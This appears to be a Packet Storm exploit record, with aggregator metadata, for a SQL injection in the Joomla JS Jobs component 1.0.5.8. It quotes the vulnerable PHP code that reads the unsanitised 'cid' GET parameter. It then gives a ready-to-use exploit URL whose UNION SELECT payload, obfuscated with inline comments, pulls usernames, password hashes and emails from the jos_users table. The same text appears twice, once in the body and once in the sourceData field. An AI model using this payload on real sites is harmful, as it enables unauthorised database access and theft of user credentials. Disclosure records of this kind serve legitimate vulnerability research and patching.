ID PACKETSTORM:90170 Type packetstorm Reporter r0i Modified 2010-06-02T00:00:00
Description
`by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i
# Exploit Title: Joomla Component com_jsjobs SQL Injection Vulnerability
#Date: 31/05/10
#Author: http://www.joomsky.com
#Software Link: http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=4
#Version: 1.0.5.8
#Tested on: Linux ubuntu32 2.6.32-22-generic x64
#Summary:
On administrator/components/com_jsjobs/views/application/view.html.php file we can find this segment code on line 53:
if ($cur_layout == 'categories'){
if (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0]; //o0ps..possible SQL Injection }:)
else $c_id='';
if ($c_id == ''){
$cids = JRequest :: getVar('cid', array (0), 'post', 'array');
$c_id= $cids[0];
}
... //conditional check some values with elseifs...
}
This check
if (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0];
open SQLi posibilities for get sense information from servers databases. Some like this:
[+]EXPLOIT:
http://localhost/joomla/administrator/index.php?option=com_jsjobs&task=edit&cid[]=-69/*!union/**/select/**/1,2,3,group_concat%28username,0x3a,password,0x3a,email%29/**/from/**/jos_users*/--
by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i
`
{"hash": "e506403fa83554240fce39eeeda5f8c2f809f41c3d9d9872dc41d5b1c622df53", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 2, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/90170/Joomla-JS-Jobs-1.0.5.8-SQL-Injection.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "d3bf12a9c340c80e382726dd37dce179"}, {"key": "modified", "hash": "eb2b14892e7d106e006cab9d94ec8cf3"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "eb2b14892e7d106e006cab9d94ec8cf3"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "fee3568beddc7d5d6577147cf354dfeb"}, {"key": "sourceData", "hash": "764f33021843781423bd1c49c1ecf411"}, {"key": "sourceHref", "hash": "bebedf1209ec7944f11d220556019183"}, {"key": "title", "hash": "98963b1a1bfc34fe10e6b2677535e883"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "2010-06-02T00:00:00", "modified": "2010-06-02T00:00:00", "title": "Joomla JS Jobs 1.0.5.8 SQL Injection", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/90170/joomlajsjobs-sql.txt", "history": [], "reporter": "r0i", "lastseen": "2016-11-03T10:28:36", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:28:36"}, "dependencies": {"references": [], "modified": "2016-11-03T10:28:36"}, "vulnersScore": 0.2}, "sourceData": "`by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \n# Exploit Title: Joomla Component com_jsjobs SQL Injection Vulnerability \n \n#Date: 31/05/10 \n \n#Author: http://www.joomsky.com \n \n#Software Link: http://www.joomsky.com/index.php?option=com_rokdownloads&view=file&task=download&id=23%3Ajs-jobs&Itemid=4 \n \n#Version: 1.0.5.8 \n \n#Tested on: Linux ubuntu32 2.6.32-22-generic x64 \n \n#Summary: \n \nOn administrator/components/com_jsjobs/views/application/view.html.php file we can find this segment code on line 53: \n \nif ($cur_layout == 'categories'){ \nif (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0]; //o0ps..possible SQL Injection }:) \nelse $c_id=''; \n \nif ($c_id == ''){ \n$cids = JRequest :: getVar('cid', array (0), 'post', 'array'); \n$c_id= $cids[0]; \n} \n \n... //conditional check some values with elseifs... \n} \n \nThis check \nif (isset($_GET['cid'][0])) $c_id= $_GET['cid'][0]; \nopen SQLi posibilities for get sense information from servers databases. Some like this: \n \n[+]EXPLOIT: \nhttp://localhost/joomla/administrator/index.php?option=com_jsjobs&task=edit&cid[]=-69/*!union/**/select/**/1,2,3,group_concat%28username,0x3a,password,0x3a,email%29/**/from/**/jos_users*/-- \n \n \nby r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i by r0i \n \n`\n", "id": "PACKETSTORM:90170"}